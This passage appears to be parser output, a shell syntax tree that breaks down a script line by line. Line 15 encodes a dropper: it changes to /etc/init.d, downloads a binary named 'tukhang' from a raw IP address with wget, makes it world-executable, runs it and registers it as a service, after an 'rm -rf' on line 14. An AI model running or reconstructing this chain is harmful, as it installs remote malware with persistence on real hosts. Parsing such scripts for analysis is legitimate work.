    WordNode(lineno=14, pos=(2019, 2022), word='-rf'),
    WordNode(lineno=14, pos=(2023, 2038), word='aaaaajanetdelds'),
  ]),
])
ListNode(lineno=15, pos=(2039, 2143), parts=[
  CommandNode(lineno=15, pos=(2039, 2053), parts=[
    WordNode(lineno=15, pos=(2039, 2041), word='cd'),
    WordNode(lineno=15, pos=(2042, 2053), word='/etc/init.d'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2053, 2054)),
  CommandNode(lineno=15, pos=(2055, 2089), parts=[
    WordNode(lineno=15, pos=(2055, 2059), word='wget'),
    WordNode(lineno=15, pos=(2060, 2089), word='http://112.211.184.20/tukhang'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2089, 2090)),
  CommandNode(lineno=15, pos=(2091, 2109), parts=[
    WordNode(lineno=15, pos=(2091, 2096), word='chmod'),
    WordNode(lineno=15, pos=(2097, 2101), word='0777'),
    WordNode(lineno=15, pos=(2102, 2109), word='tukhang'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2109, 2110)),
  CommandNode(lineno=15, pos=(2111, 2120), parts=[
    WordNode(lineno=15, pos=(2111, 2120), word='./tukhang'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2120, 2121)),
  CommandNode(lineno=15, pos=(2122, 2143), parts=[
    WordNode(lineno=15, pos=(2122, 2129), word='service'),
    WordNode(lineno=15, pos=(2130, 2137), word='tukhang'),
    WordNode(lineno=15, pos=(2138, 2143), word='start'),
  ]),
])
